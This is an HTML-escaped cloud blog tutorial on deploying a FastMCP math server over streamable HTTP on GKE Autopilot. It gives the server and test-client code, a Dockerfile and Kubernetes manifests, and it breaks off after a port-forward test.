&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Integrating context from tools and data sources into LLMs can be challenging, which impacts the ease of development for AI agents. To address this challenge, Anthropic introduced the &lt;/span&gt;&lt;a href="https://modelcontextprotocol.io/introduction" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Model Context Protocol (MCP)&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, which standardizes how applications provide context to these models. Developers often want to build an MCP server for their APIs to make them available to fellow developers, allowing them to use it as context in their own applications. Google Kubernetes Engine (GKE) provides a scalable, reliable, and secure environment to deploy these remote MCP servers.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;This guide shows the straightforward process of setting up a secure remote MCP server on GKE.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h2&gt;MCP transports&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The Model Context Protocol follows a client-server architecture. It initially only supported running the server locally using the &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;stdio&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; transport. The protocol has since evolved and now supports remote access transports, specifically &lt;/span&gt;&lt;a href="https://modelcontextprotocol.io/specification/latest/basic/transports#streamable-http" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Streamable HTTP&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;With Streamable HTTP, the server operates as an independent process that can handle multiple client connections. This transport uses HTTP POST and GET requests. The server must provide a single HTTP endpoint path that supports both POST and GET methods, such as &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;https://example.com/mcp&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;. You can learn more about the different transports in the &lt;/span&gt;&lt;a href="https://modelcontextprotocol.io/docs/concepts/architecture#transport-layer" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;official documentation&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h2&gt;Benefits of running an MCP server on GKE&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Running an MCP server remotely on GKE provides several architecture benefits:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Scalability:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; GKE Autopilot is built to handle highly variable traffic. Since MCP Servers are stateless, GKE can scale horizontally to handle spikes in demand efficiently.&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Centralized access:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Teams can share access to a centralized MCP server, allowing developers to connect from local machines, Agents or pipelines instead of running redundant local servers. Updates to the central server immediately benefit everyone.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Enhanced security:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; The Kubernetes Gateway API combined with SSL certificates provides an easy way to force secure, encrypted traffic. This allows only secure connections to the MCP server, preventing unauthorized access.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h2&gt;Prerequisites&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Before starting, ensure the following tools are installed:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;python 3.10 or higher&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;uv (for package and project management, see the &lt;/span&gt;&lt;a href="https://docs.astral.sh/uv/getting-started/installation/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;installation documentation&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;)&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Google Cloud SDK (&lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;gcloud&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;)&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;code style="vertical-align: baseline;"&gt;kubectl&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; command-line tool&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h2&gt;Installation&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Prepare environment variables&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;export PROJECT_ID=$(gcloud config get-value project)\r\nexport REGION=us-central1&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f56108d5760&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Create a folder, &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;mcp-on-gke&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;, to store the code for the server and deployment.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;mkdir mcp-on-gke &amp;amp;&amp;amp; cd mcp-on-gke&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f56108d51c0&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Now configure the Google Cloud credentials and set the active project.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;gcloud auth login\r\ngcloud config set project $PROJECT_ID&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f56108d5df0&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Initiate the GKE Autopilot cluster creation in the background. This process takes a few minutes, so starting it now allows the cluster to provision while you complete the rest of the setup. Make sure to use an Autopilot version that ensures &lt;/span&gt;&lt;a href="https://cloud.google.com/kubernetes-engine/docs/concepts/autopilot-compute-classes" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Cost-Optimized Compute (CCOP)&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; is enabled for fast autoscale.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;gcloud container clusters create-auto mcp-cluster \\\r\n    --region $REGION \\\r\n    --release-channel rapid \\\r\n    --async&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f56108d5bb0&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Use &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;uv&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; to create a project, which will generate a &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;pyproject.toml&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; file.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;uv init&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f56108d5610&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Next, create the additional files needed: &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;server.py&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; for the MCP server code, &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;test_server.py&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; for testing, and a &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;Dockerfile&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; for the container deployment.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h2&gt;Math MCP server&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Large language models are excellent at non-deterministic tasks, such as generating text, summarizing ideas, and reasoning about concepts. However, they can be unreliable for deterministic tasks like math operations. To solve this, developers can create tools that provide valuable context. Using &lt;/span&gt;&lt;a href="https://gofastmcp.com/getting-started/welcome" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;FastMCP&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, a framework for building MCP servers in Python, it is possible to create a simple math server with two tools: add and subtract.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;First, add FastMCP as a dependency.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;uv add fastmcp\r\nuv add asyncio&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f56108d53d0&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Copy the following code into &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;server.py&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; to create the server.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;from fastmcp import FastMCP\r\nfrom starlette.requests import Request\r\nfrom starlette.responses import PlainTextResponse\r\nimport asyncio\r\nimport logging\r\n\r\nlogger = logging.getLogger(__name__)\r\nlogging.basicConfig(format=&amp;quot;[%(levelname)s]: %(message)s&amp;quot;, level=logging.INFO)\r\n\r\nmcp_port=3000\r\n\r\n# Initialize the FastMCP server\r\nserver = FastMCP(\r\n    &amp;quot;Math Server&amp;quot;,\r\n)\r\n\r\n@server.tool()\r\ndef add(a: int, b: int) -&amp;gt; int:\r\n    &amp;quot;&amp;quot;&amp;quot;Add two numbers together.&amp;quot;&amp;quot;&amp;quot;\r\n    return a + b\r\n\r\n@server.tool()\r\ndef subtract(a: int, b: int) -&amp;gt; int:\r\n    &amp;quot;&amp;quot;&amp;quot;Subtract the second number from the first.&amp;quot;&amp;quot;&amp;quot;\r\n    return a - b\r\n\r\n@server.custom_route(&amp;quot;/healthz&amp;quot;, methods=[&amp;quot;GET&amp;quot;])\r\nasync def health_check(request: Request) -&amp;gt; PlainTextResponse:\r\n    &amp;quot;&amp;quot;&amp;quot;Simple health check endpoint that returns a 200 OK response&amp;quot;&amp;quot;&amp;quot;\r\n    return PlainTextResponse(&amp;quot;OK&amp;quot;)\r\n\r\nif __name__ == &amp;quot;__main__&amp;quot;:\r\n    logger.info(f&amp;quot; MCP server started on port {mcp_port}&amp;quot;)\r\n    # Could also use \&amp;#x27;sse\&amp;#x27; transport, host=&amp;quot;0.0.0.0&amp;quot; required for Cloud Run.\r\n    asyncio.run(\r\n        server.run_async(\r\n            transport=&amp;quot;streamable-http&amp;quot;, \r\n            host=&amp;quot;0.0.0.0&amp;quot;,\r\n            port=mcp_port\r\n        )\r\n    )&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;lang-py&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f56108d56d0&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This example uses the &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;streamable-http&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; transport, which is recommended for remote servers. The script encapsulates the logic needed to run a scalable MCP endpoint.&lt;/span&gt;&lt;/p&gt;
&lt;h2&gt;&lt;span style="vertical-align: baseline;"&gt;Testing the MCP server locally&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Create the &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;test_mcp_server.py&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; script to connect to test the MCP Server. This will be useful to test the MCP server before deploying it to GKE.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;from fastmcp import Client, FastMCP\r\nimport asyncio\r\nimport logging\r\n\r\n# Connect to the remote MCP server\r\nclient = Client(&amp;quot;https://localhost:3000/mcp&amp;quot;)\r\n\r\nasync def test_remote_server():\r\n    async with client:\r\n        # Basic server interaction\r\n        await client.ping()\r\n\r\n        # List available operations\r\n        tools = await client.list_tools()\r\n        print(f&amp;quot;Available tools: {tools} \\n&amp;quot;)\r\n\r\n        # Execute add operation\r\n        result = await client.call_tool(&amp;quot;add&amp;quot;, {&amp;quot;a&amp;quot;: 5, &amp;quot;b&amp;quot;: 3})\r\n        print(f&amp;quot;Result of addition: {result} \\n&amp;quot;)\r\n\r\n        # Execute subtract operation\r\n        result = await client.call_tool(&amp;quot;subtract&amp;quot;, {&amp;quot;a&amp;quot;: 5, &amp;quot;b&amp;quot;: 3})\r\n        print(f&amp;quot;Result of subtraction: {result} \\n&amp;quot;)\r\n\r\nif __name__ == &amp;quot;__main__&amp;quot;:\r\n    asyncio.run(test_remote_server())&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;lang-py&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f56108d5190&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Run the MCP server locally to test the connection:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;uv run server.py&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f561092edc0&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Then execute the test script in a new terminal to verify the connection.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;uv run test_mcp_server.py&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f561092e280&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The output should print available tools and the results of invocing the &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;add&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; and &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;subtract&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; tools confirming the MCP server is functional.&lt;/span&gt;&lt;/p&gt;
&lt;h2&gt;Building the container image&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To speed up the deployment process, build the container image while the cluster is still creating.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;First, prepare the &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;Dockerfile&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;:&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;FROM python:3.10-slim\r\nCOPY --from=ghcr.io/astral-sh/uv:0.4.15 /uv /bin/uv\r\nWORKDIR /app\r\nCOPY pyproject.toml .\r\nCOPY server.py .\r\nRUN uv sync\r\nCMD [&amp;quot;uv&amp;quot;, &amp;quot;run&amp;quot;, &amp;quot;server.py&amp;quot;]&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f561092ee20&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Now, set up the Artifact Registry and build the container image.&lt;/span&gt;&lt;/p&gt;
&lt;h2&gt;Set up Artifact Registry&lt;/h2&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;gcloud artifacts repositories create mcp-repo \r\n--repository-format=docker \r\n--location=$REGION&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f561092ed00&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h2&gt;Build and push the image in parallel&lt;/h2&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;gcloud builds submit --tag $REGION-docker.pkg.dev/$PROJECT_ID/mcp-repo/math-mcp-server:latest&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f561092e100&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Once the image build is complete, verify that the cluster is ready and retrieve the credentials. If the output of the cluster is not "RUNNING" wait for it to be ready.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;gcloud container clusters list\r\ngcloud container clusters get-credentials mcp-cluster --region $REGION&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f561092e9a0&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h2&gt;Deploying to GKE with Gateway API and SSL&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The next step involves deploying the server workloads and exposing them securely using the &lt;/span&gt;&lt;a href="https://cloud.google.com/kubernetes-engine/docs/how-to/gatewayclass-capabilities" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Kubernetes Gateway API&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; rather than the legacy Ingress. This guarantees secure, encrypted traffic via SSL certificates.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Create a &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;deployment.yaml&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; file to define the Kubernetes Deployment and Service. Replace the placeholders with your actual project ID and region.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;apiVersion: apps/v1\r\nkind: Deployment\r\nmetadata:\r\n  name: mcp-server\r\nspec:\r\n  replicas: 2\r\n  selector:\r\n    matchLabels:\r\n      app: mcp-server\r\n  template:\r\n    metadata:\r\n      labels:\r\n        app: mcp-server\r\n    spec:\r\n      containers:\r\n      - name: mcp-server\r\n        image: $REGION-docker.pkg.dev/$PROJECT_ID/mcp-repo/math-mcp-server:latest\r\n        ports:\r\n        - containerPort: 3000\r\n        resources:\r\n          requests:\r\n            memory: &amp;quot;256Mi&amp;quot;\r\n            cpu: &amp;quot;250m&amp;quot;\r\n          limits:\r\n            memory: &amp;quot;512Mi&amp;quot;\r\n            cpu: &amp;quot;500m&amp;quot;\r\n        livenessProbe:\r\n          httpGet:\r\n            path: /healthz\r\n            port: 3000\r\n          initialDelaySeconds: 15\r\n          periodSeconds: 20\r\n        readinessProbe:\r\n          httpGet:\r\n            path: /healthz\r\n            port: 3000\r\n          initialDelaySeconds: 5\r\n          periodSeconds: 10\r\n---\r\napiVersion: v1\r\nkind: Service\r\nmetadata:\r\n  name: mcp-service\r\nspec:\r\n  selector:\r\n    app: mcp-server\r\n  ports:\r\n  - port: 80\r\n    targetPort: 3000&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f561092eee0&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Apply this configuration to the cluster:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;kubectl apply -f deployment.yaml&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f561092ecd0&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Check the pods are up and running&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;kubectl get pods&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f561092e0d0&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To ensure our remote MCP Server is accessible let's try to reach it with a port-forward.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;kubectl port-forward svc/mcp-service 8080:80&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f561092e520&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Run the test script to verify the connection. make sure to edit the MCP Server URL in the test script to &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;http://localhost:8080/mcp&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;uv run test_mcp_server.py&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f561092ef10&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
